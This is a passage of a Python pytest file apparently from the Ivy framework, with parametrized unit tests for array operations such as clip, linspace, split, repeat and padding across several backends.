x0 = ivy.array(x0, dtype, dev)
x1 = ivy.array(x1, dtype, dev)
res = ivy.array_equal(x0, x1)
# type test
assert ivy.is_native_array(x0)
assert ivy.is_native_array(x1)
assert isinstance(res, bool) or ivy.is_native_array(res)
# value test
assert res == true_res
# arrays_equal
@pytest.mark.parametrize(
"xs_n_res", [([[[0.], [1.]], [[0.], [1.]], [[1.], [2.]]], False)])
@pytest.mark.parametrize(
"dtype", ['float32'])
def test_arrays_equal(xs_n_res, dtype, dev, call):
xs, true_res = xs_n_res
# smoke test
x0 = ivy.array(xs[0], dtype, dev)
x1 = ivy.array(xs[1], dtype, dev)
x2 = ivy.array(xs[2], dtype, dev)
res = ivy.arrays_equal([x0, x1, x2])
# type test
assert ivy.is_native_array(x0)
assert ivy.is_native_array(x1)
assert ivy.is_native_array(x2)
assert isinstance(res, bool) or ivy.is_native_array(res)
# value test
assert res == true_res
# equal
@pytest.mark.parametrize(
"x0_n_x1_n_x2_em_n_res", [([0.], [0.], [0.], False, True),
([0.], [1.], [0.], False, False),
([0.], [1.], [0.], True, [[True, False, True],
[False, True, False],
[True, False, True]]),
({'a': 0}, {'a': 0}, {'a': 1}, True, [[True, True, False],
[True, True, False],
[False, False, True]])])
@pytest.mark.parametrize(
"to_array", [True, False])
def test_equal(x0_n_x1_n_x2_em_n_res, to_array, dev, call):
x0, x1, x2, equality_matrix, true_res = x0_n_x1_n_x2_em_n_res
# smoke test
if isinstance(x0, list) and to_array:
x0 = ivy.array(x0, dev=dev)
x1 = ivy.array(x1, dev=dev)
x2 = ivy.array(x2, dev=dev)
res = ivy.all_equal(x0, x1, x2, equality_matrix=equality_matrix)
# value test
if equality_matrix:
assert np.array_equal(ivy.to_numpy(res), np.array(true_res))
else:
assert res == true_res
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support variable number of input arguments
return
# to_numpy
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_numpy(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_numpy() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_numpy(tensor_fn(object_in, dtype, dev))
# type test
assert isinstance(ret, np.ndarray)
# cardinality test
assert ret.shape == np.array(object_in).shape
# value test
assert np.allclose(ivy.to_numpy(tensor_fn(object_in, dtype, dev)), np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support numpy conversion
return
# to_scalar
@pytest.mark.parametrize(
"object_in", [[0.], [[[1]]], [True], [[1.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_scalar(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_scalar() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_scalar(tensor_fn(object_in, dtype, dev))
true_val = ivy.to_numpy(ivy.array(object_in, dtype=dtype)).item()
# type test
assert isinstance(ret, type(true_val))
# value test
assert ivy.to_scalar(tensor_fn(object_in, dtype, dev)) == true_val
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support scalar conversion
return
# to_list
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_to_list(object_in, dtype, tensor_fn, dev, call):
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call in [helpers.tf_graph_call]:
# to_list() requires eager execution
pytest.skip()
# smoke test
ret = ivy.to_list(tensor_fn(object_in, dtype, dev))
# type test
assert isinstance(ret, list)
# cardinality test
assert _get_shape_of_list(ret) == _get_shape_of_list(object_in)
# value test
assert np.allclose(np.asarray(ivy.to_list(tensor_fn(object_in, dtype, dev))),
np.array(object_in).astype(dtype))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support list conversion
return
# shape
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"as_tensor", [None, True, False])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_shape(object_in, dtype, as_tensor, tensor_fn, dev, call):
# smoke test
if len(object_in) == 0 and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ret = ivy.shape(tensor_fn(object_in, dtype, dev), as_tensor)
# type test
if as_tensor:
assert ivy.is_native_array(ret)
else:
assert isinstance(ret, tuple)
ret = ivy.array(ret)
# cardinality test
assert ret.shape[0] == len(np.asarray(object_in).shape)
# value test
assert np.array_equal(ivy.to_numpy(ret), np.asarray(np.asarray(object_in).shape, np.int32))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Union
return
# get_num_dims
@pytest.mark.parametrize(
"object_in", [[], [0.], [1], [True], [[1., 2.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"as_tensor", [None, True, False])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_get_num_dims(object_in, dtype, as_tensor, tensor_fn, dev, call):
# smoke test
if len(object_in) == 0 and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ret = ivy.get_num_dims(tensor_fn(object_in, dtype, dev), as_tensor)
# type test
if as_tensor:
assert ivy.is_native_array(ret)
else:
assert isinstance(ret, int)
ret = ivy.array(ret)
# cardinality test
assert list(ret.shape) == []
# value test
assert np.array_equal(ivy.to_numpy(ret), np.asarray(len(np.asarray(object_in).shape), np.int32))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting does not support Union
return
# minimum
@pytest.mark.parametrize(
"xy", [([0.7], [0.5]), ([0.7], 0.5), (0.5, [0.7]), ([[0.8, 1.2], [1.5, 0.2]], [0., 1.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_minimum(xy, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(xy[0], Number) or isinstance(xy[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(xy[0], dtype, dev)
y = tensor_fn(xy[1], dtype, dev)
ret = ivy.minimum(x, y)
# type test
assert ivy.is_native_array(ret)
# cardinality test
if len(x.shape) > len(y.shape):
assert ret.shape == x.shape
else:
assert ret.shape == y.shape
# value test
assert np.array_equal(call(ivy.minimum, x, y), np.asarray(ivy.functional.backends.numpy.minimum(ivy.to_numpy(x), ivy.to_numpy(y))))
# maximum
@pytest.mark.parametrize(
"xy", [([0.7], [0.5]), ([0.7], 0.5), (0.5, [0.7]), ([[0.8, 1.2], [1.5, 0.2]], [0., 1.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_maximum(xy, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(xy[0], Number) or isinstance(xy[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(xy[0], dtype, dev)
y = tensor_fn(xy[1], dtype, dev)
ret = ivy.maximum(x, y)
# type test
assert ivy.is_native_array(ret)
# cardinality test
if len(x.shape) > len(y.shape):
assert ret.shape == x.shape
else:
assert ret.shape == y.shape
# value test
assert np.array_equal(call(ivy.maximum, x, y), np.asarray(ivy.functional.backends.numpy.maximum(ivy.to_numpy(x), ivy.to_numpy(y))))
# clip
@pytest.mark.parametrize(
"x_min_n_max", [(-0.5, 0., 1.5), ([1.7], [0.5], [1.1]), ([[0.8, 2.2], [1.5, 0.2]], 0.2, 1.4),
([[0.8, 2.2], [1.5, 0.2]], [[1., 1.], [1., 1.]], [[1.1, 2.], [1.1, 2.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_clip(x_min_n_max, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_min_n_max[0], Number) or isinstance(x_min_n_max[1], Number) or isinstance(x_min_n_max[2], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_min_n_max[0], dtype, dev)
min_val = tensor_fn(x_min_n_max[1], dtype, dev)
max_val = tensor_fn(x_min_n_max[2], dtype, dev)
if ((min_val.shape != [] and min_val.shape != [1]) or (max_val.shape != [] and max_val.shape != [1]))\
and call in [helpers.mx_call]:
# mxnet only supports numbers or 0 or 1 dimensional arrays for min and max while performing clip
pytest.skip()
ret = ivy.clip(x, min_val, max_val)
# type test
assert ivy.is_native_array(ret)
# cardinality test
max_shape = max([x.shape, min_val.shape, max_val.shape], key=lambda x_: len(x_))
assert ret.shape == max_shape
# value test
assert np.array_equal(call(ivy.clip, x, min_val, max_val),
np.asarray(ivy.functional.backends.numpy.clip(ivy.to_numpy(x), ivy.to_numpy(min_val), ivy.to_numpy(max_val))))
# clip_vector_norm
@pytest.mark.parametrize(
"x_max_norm_n_p_val_clipped",
[(-0.5, 0.4, 2., -0.4), ([1.7], 1.5, 3., [1.5]),
([[0.8, 2.2], [1.5, 0.2]], 4., 1., [[0.6808511, 1.8723406], [1.2765958, 0.17021278]]),
([[0.8, 2.2], [1.5, 0.2]], 2.5, 2., [[0.71749604, 1.9731141], [1.345305, 0.17937401]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_clip_vector_norm(x_max_norm_n_p_val_clipped, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_max_norm_n_p_val_clipped[0], dtype, dev)
max_norm = x_max_norm_n_p_val_clipped[1]
p_val = x_max_norm_n_p_val_clipped[2]
clipped = x_max_norm_n_p_val_clipped[3]
ret = ivy.clip_vector_norm(x, max_norm, p_val)
# type test
assert ivy.is_native_array(ret)
# cardinality test
assert ret.shape == (x.shape if len(x.shape) else (1,))
# value test
assert np.allclose(call(ivy.clip_vector_norm, x, max_norm, p_val), np.array(clipped))
# compilation test
if call is helpers.torch_call:
# pytorch jit cannot compile global variables, in this case MIN_DENOMINATOR
return
# round
@pytest.mark.parametrize(
"x_n_x_rounded", [(-0.51, -1), ([1.7], [2.]), ([[0.8, 2.2], [1.51, 0.2]], [[1., 2.], [2., 0.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_round(x_n_x_rounded, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_rounded[0], Number) or isinstance(x_n_x_rounded[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_rounded[0], dtype, dev)
ret = ivy.round(x)
# type test
assert ivy.is_native_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.array_equal(call(ivy.round, x), np.array(x_n_x_rounded[1]))
# floormod
@pytest.mark.parametrize(
"x_n_divisor_n_x_floormod", [(2.5, 2., 0.5), ([10.7], [5.], [0.7]),
([[0.8, 2.2], [1.7, 0.2]], [[0.3, 0.5], [0.4, 0.11]], [[0.2, 0.2], [0.1, 0.09]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_floormod(x_n_divisor_n_x_floormod, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_divisor_n_x_floormod[0], Number) or isinstance(x_n_divisor_n_x_floormod[1], Number) or
isinstance(x_n_divisor_n_x_floormod[2], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_divisor_n_x_floormod[0], dtype, dev)
divisor = ivy.array(x_n_divisor_n_x_floormod[1], dtype, dev)
ret = ivy.floormod(x, divisor)
# type test
assert ivy.is_native_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.floormod, x, divisor), np.array(x_n_divisor_n_x_floormod[2]))
# ceil
@pytest.mark.parametrize(
"x_n_x_ceiled", [(2.5, 3.), ([10.7], [11.]), ([[3.8, 2.2], [1.7, 0.2]], [[4., 3.], [2., 1.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_ceil(x_n_x_ceiled, dtype, tensor_fn, dev, call):
# smoke test
if (isinstance(x_n_x_ceiled[0], Number) or isinstance(x_n_x_ceiled[1], Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x_n_x_ceiled[0], dtype, dev)
ret = ivy.ceil(x)
# type test
assert ivy.is_native_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.ceil, x), np.array(x_n_x_ceiled[1]))
# argmax
# @pytest.mark.parametrize(
# "x_n_axis_x_argmax", [([-0.3, 0.1], None, [1]), ([[1.3, 2.6], [2.3, 2.5]], 0, [1, 0]),
# ([[1.3, 2.6], [2.3, 2.5]], 1, [1, 1])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_argmax(x_n_axis_x_argmax, dtype, tensor_fn, dev, call):
# # smoke test
# x = ivy.array(x_n_axis_x_argmax[0], dtype, dev)
# axis = x_n_axis_x_argmax[1]
# ret = ivy.argmax(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert tuple(ret.shape) == (len(x.shape),)
# # value test
# assert np.allclose(call(ivy.argmax, x, axis), np.array(x_n_axis_x_argmax[2]))
# argsort
# @pytest.mark.parametrize(
# "x_n_axis_x_argsort", [([1, 10, 26.9, 2.8, 166.32, 62.3], -1, [0, 3, 1, 2, 5, 4])])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_argsort(x_n_axis_x_argsort, dtype, tensor_fn, dev, call):
# # smoke test
# x = tensor_fn(x_n_axis_x_argsort[0], dtype, dev)
# axis = x_n_axis_x_argsort[1]
# ret = ivy.argsort(x, axis)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert tuple(ret.shape) == (6,)
# # value test
# assert np.allclose(call(ivy.argsort, x, axis), np.array(x_n_axis_x_argsort[2]))
# arange
@pytest.mark.parametrize(
"stop_n_start_n_step", [[10, None, None], [10, 2, None], [10, 2, 2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_arange(stop_n_start_n_step, dtype, tensor_fn, dev, call):
# smoke test
stop, start, step = stop_n_start_n_step
if (isinstance(stop, Number) or isinstance(start, Number) or isinstance(step, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
if tensor_fn == helpers.var_fn and call is helpers.torch_call:
# pytorch does not support arange using variables as input
pytest.skip()
args = list()
if stop:
stop = tensor_fn(stop, dtype, dev)
args.append(stop)
if start:
start = tensor_fn(start, dtype, dev)
args.append(start)
if step:
step = tensor_fn(step, dtype, dev)
args.append(step)
ret = ivy.arange(*args, dtype=dtype, dev=dev)
# type test
assert ivy.is_native_array(ret)
# cardinality test
assert ret.shape == (int((ivy.to_list(stop) -
(ivy.to_list(start) if start else 0))/(ivy.to_list(step) if step else 1)),)
# value test
assert np.array_equal(call(ivy.arange, *args, dtype=dtype, dev=dev),
np.asarray(ivy.functional.backends.numpy.arange(*[ivy.to_numpy(arg) for arg in args], dtype=dtype)))
# linspace
@pytest.mark.parametrize(
"start_n_stop_n_num_n_axis", [[1, 10, 100, None], [[[0., 1., 2.]], [[1., 2., 3.]], 150, -1],
[[[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], 6, -2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_linspace(start_n_stop_n_num_n_axis, dtype, tensor_fn, dev, call):
# smoke test
start, stop, num, axis = start_n_stop_n_num_n_axis
if (isinstance(start, Number) or isinstance(stop, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
start = tensor_fn(start, dtype, dev)
stop = tensor_fn(stop, dtype, dev)
ret = ivy.linspace(start, stop, num, axis, dev=dev)
# type test
assert ivy.is_native_array(ret)
# cardinality test
target_shape = list(start.shape)
target_shape.insert(axis + 1 if (axis and axis != -1) else len(target_shape), num)
assert ret.shape == tuple(target_shape)
# value test
assert np.allclose(call(ivy.linspace, start, stop, num, axis, dev=dev),
np.asarray(ivy.functional.backends.numpy.linspace(ivy.to_numpy(start), ivy.to_numpy(stop), num, axis)))
# logspace
@pytest.mark.parametrize(
"start_n_stop_n_num_n_base_n_axis", [[1, 10, 100, 10., None], [[[0., 1., 2.]], [[1., 2., 3.]], 150, 2., -1],
[[[[-0.1471, 0.4477, 0.2214]]], [[[-0.3048, 0.3308, 0.2721]]], 6, 5., -2]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_logspace(start_n_stop_n_num_n_base_n_axis, dtype, tensor_fn, dev, call):
# smoke test
start, stop, num, base, axis = start_n_stop_n_num_n_base_n_axis
if (isinstance(start, Number) or isinstance(stop, Number))\
and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
start = tensor_fn(start, dtype, dev)
stop = tensor_fn(stop, dtype, dev)
ret = ivy.logspace(start, stop, num, base, axis, dev=dev)
# type test
assert ivy.is_native_array(ret)
# cardinality test
target_shape = list(start.shape)
target_shape.insert(axis + 1 if (axis and axis != -1) else len(target_shape), num)
assert ret.shape == tuple(target_shape)
# value test
assert np.allclose(call(ivy.logspace, start, stop, num, base, axis, dev=dev),
ivy.functional.backends.numpy.logspace(ivy.to_numpy(start), ivy.to_numpy(stop), num, base, axis))
# flip
# @pytest.mark.parametrize(
# "x_n_axis_n_bs", [(1, 0, None), ([[0., 1., 2.]], None, (1, 3)), ([[0., 1., 2.]], 1, (1, 3)),
# ([[[-0.1471, 0.4477, 0.2214]]], None, None)])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_flip(x_n_axis_n_bs, dtype, tensor_fn, dev, call):
# # smoke test
# x, axis, bs = x_n_axis_n_bs
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret = ivy.flip(x, axis, bs)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# assert ret.shape == x.shape
# # value test
# assert np.allclose(call(ivy.flip, x, axis, bs), np.asarray(ivy.functional.backends.numpy.flip(ivy.to_numpy(x), axis, bs)))
# unstack
@pytest.mark.parametrize(
"x_n_axis", [(1, -1), ([[0., 1., 2.]], 0), ([[0., 1., 2.]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_unstack(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.unstack(x, axis)
# type test
assert isinstance(ret, list)
# cardinality test
axis_val = (axis % len(x.shape) if (axis is not None and len(x.shape) != 0) else len(x.shape) - 1)
if x.shape == ():
expected_shape = ()
else:
expected_shape = list(x.shape)
expected_shape.pop(axis_val)
assert ret[0].shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.unstack, x, axis), np.asarray(ivy.functional.backends.numpy.unstack(ivy.to_numpy(x), axis)))
# split
@pytest.mark.parametrize(
"x_n_noss_n_axis_n_wr", [(1, 1, -1, False),
([[0., 1., 2., 3.]], 2, 1, False),
([[0., 1., 2.], [3., 4., 5.]], 2, 0, False),
([[0., 1., 2.], [3., 4., 5.]], 2, 1, True),
([[0., 1., 2.], [3., 4., 5.]], [2, 1], 1, False)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_split(x_n_noss_n_axis_n_wr, dtype, tensor_fn, dev, call):
# smoke test
x, num_or_size_splits, axis, with_remainder = x_n_noss_n_axis_n_wr
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.split(x, num_or_size_splits, axis, with_remainder)
# type test
assert isinstance(ret, list)
# cardinality test
axis_val = (axis % len(x.shape) if (axis is not None and len(x.shape) != 0) else len(x.shape) - 1)
if x.shape == ():
expected_shape = ()
elif isinstance(num_or_size_splits, int):
expected_shape = tuple([math.ceil(item/num_or_size_splits) if i == axis_val else item
for i, item in enumerate(x.shape)])
else:
expected_shape = tuple([num_or_size_splits[0] if i == axis_val else item for i, item in enumerate(x.shape)])
assert ret[0].shape == expected_shape
# value test
pred_split = call(ivy.split, x, num_or_size_splits, axis, with_remainder)
true_split = ivy.functional.backends.numpy.split(ivy.to_numpy(x), num_or_size_splits, axis, with_remainder)
for pred, true in zip(pred_split, true_split):
assert np.allclose(pred, true)
# compilation test
if call is helpers.torch_call:
# pytorch scripting does not support Union or Numbers for type hinting
return
# repeat
@pytest.mark.parametrize(
"x_n_reps_n_axis", [(1, [1], 0), (1, 2, -1), (1, [2], None), ([[0., 1., 2., 3.]], (2, 1, 0, 3), -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_repeat(x_n_reps_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, reps_raw, axis = x_n_reps_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
if not isinstance(reps_raw, int) and call is helpers.mx_call:
# mxnet repeat only supports integer repeats
pytest.skip()
x = tensor_fn(x, dtype, dev)
x_shape = list(x.shape)
if call not in [helpers.jnp_call, helpers.torch_call]:
# jax and pytorch repeat do not support repeats specified as lists
ret_from_list = ivy.repeat(x, reps_raw, axis)
reps = ivy.array(reps_raw, 'int32', dev)
if call is helpers.mx_call:
# mxnet only supports repeats defined as as int
ret = ivy.repeat(x, reps_raw, axis)
else:
ret = ivy.repeat(x, reps, axis)
# type test
assert ivy.is_native_array(ret)
# cardinality test
if x.shape == ():
expected_shape = [reps_raw] if isinstance(reps_raw, int) else list(reps_raw)
else:
axis_wrapped = axis % len(x_shape)
expected_shape = x_shape[0:axis_wrapped] + [sum(reps_raw)] + x_shape[axis_wrapped+1:]
assert list(ret.shape) == expected_shape
# value test
if call is helpers.mx_call:
# mxnet only supports repeats defined as as int
assert np.allclose(call(ivy.repeat, x, reps_raw, axis),
np.asarray(ivy.functional.backends.numpy.repeat(ivy.to_numpy(x), ivy.to_numpy(reps), axis)))
else:
assert np.allclose(call(ivy.repeat, x, reps, axis),
np.asarray(ivy.functional.backends.numpy.repeat(ivy.to_numpy(x), ivy.to_numpy(reps), axis)))
# tile
# @pytest.mark.parametrize(
# "x_n_reps", [(1, [1]), (1, 2), (1, [2]), ([[0., 1., 2., 3.]], (2, 1))])
# @pytest.mark.parametrize(
# "dtype", ['float32'])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_tile(x_n_reps, dtype, tensor_fn, dev, call):
# # smoke test
# x, reps_raw = x_n_reps
# if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# # mxnet does not support 0-dimensional variables
# pytest.skip()
# x = tensor_fn(x, dtype, dev)
# ret_from_list = ivy.tile(x, reps_raw)
# reps = ivy.array(reps_raw, 'int32', dev)
# ret = ivy.tile(x, reps)
# # type test
# assert ivy.is_array(ret)
# # cardinality test
# if x.shape == ():
# expected_shape = tuple(reps_raw) if isinstance(reps_raw, list) else (reps_raw,)
# else:
# expected_shape = tuple([int(item * rep) for item, rep in zip(x.shape, reps_raw)])
# assert ret.shape == expected_shape
# # value test
# assert np.allclose(call(ivy.tile, x, reps),
# np.asarray(ivy.functional.backends.numpy.tile(ivy.to_numpy(x), ivy.to_numpy(reps))))
# zero_pad
@pytest.mark.parametrize(
"x_n_pw", [(1, [[1, 1]]), (1, [[0, 0]]), ([[0., 1., 2., 3.]], [[0, 1], [1, 2]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_zero_pad(x_n_pw, dtype, tensor_fn, dev, call):
# smoke test
x, pw_raw = x_n_pw
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret_from_list = ivy.zero_pad(x, pw_raw)
pw = ivy.array(pw_raw, 'int32', dev)
ret = ivy.zero_pad(x, pw)
# type test
assert ivy.is_native_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else x.shape
expected_shape = tuple([int(item + pw_[0] + pw_[1]) for item, pw_ in zip(x_shape, pw_raw)])
assert ret.shape == expected_shape
# value test
assert np.allclose(call(ivy.zero_pad, x, pw), ivy.functional.backends.numpy.zero_pad(ivy.to_numpy(x), ivy.to_numpy(pw)))
# fourier_encode
@pytest.mark.parametrize(
"x_n_mf_n_nb_n_gt", [([2.], 4., 4, [[2.0000000e+00, 1.7484555e-07, 9.9805772e-01,-5.2196848e-01,
3.4969111e-07, 1.0000000e+00, -6.2295943e-02, -8.5296476e-01, 1.0000000e+00]]),
([[1., 2.], [3., 4.], [5., 6.]], [2., 4.], 4,
[[[1.0000000e+00, -8.7422777e-08, -8.7422777e-08, -8.7422777e-08,
-8.7422777e-08, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
-1.0000000e+00],
[2.0000000e+00, 1.7484555e-07, 9.9805772e-01, -5.2196848e-01,
-6.0398321e-07, 1.0000000e+00, -6.2295943e-02, -8.5296476e-01,
1.0000000e+00]],
[[3.0000000e+00, -2.3849761e-08, -2.3849761e-08, -2.3849761e-08,
-2.3849761e-08, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
-1.0000000e+00],
[4.0000000e+00, 3.4969111e-07, -1.2434989e-01, 8.9044148e-01,
-1.2079664e-06, 1.0000000e+00, -9.9223840e-01, 4.5509776e-01,
1.0000000e+00]],
[[5.0000000e+00, -6.7553248e-07, -6.7553248e-07, -6.7553248e-07,
-6.7553248e-07, -1.0000000e+00, -1.0000000e+00, -1.0000000e+00,
-1.0000000e+00],
[6.0000000e+00, 4.7699523e-08, -9.8256493e-01, -9.9706185e-01,
-3.7192983e-06, 1.0000000e+00, 1.8591987e-01, 7.6601014e-02,
1.0000000e+00]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_fourier_encode(x_n_mf_n_nb_n_gt, dtype, tensor_fn, dev, call):
# smoke test
x, max_freq, num_bands, ground_truth = x_n_mf_n_nb_n_gt
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
if isinstance(max_freq, list):
max_freq = tensor_fn(max_freq, dtype, dev)
ret = ivy.fourier_encode(x, max_freq, num_bands)
# type test
assert ivy.is_native_array(ret)
# cardinality test
x_shape = [1] if x.shape == () else list(x.shape)
expected_shape = x_shape + [1 + 2*num_bands]
assert list(ret.shape) == expected_shape
# value test
assert np.allclose(call(ivy.fourier_encode, x, max_freq, num_bands), np.array(ground_truth), atol=1e-5)
# constant_pad
@pytest.mark.parametrize(
"x_n_pw_n_val", [(1, [[1, 1]], 1.5), (1, [[0, 0]], -2.7), ([[0., 1., 2., 3.]], [[0, 1], [1, 2]], 11.)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_constant_pad(x_n_pw_n_val, dtype, tensor_fn, dev, call):
# smoke test
x, pw_raw, val = x_n_pw_n_val
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret_from_list = ivy.constant_pad(x, pw_raw, val)
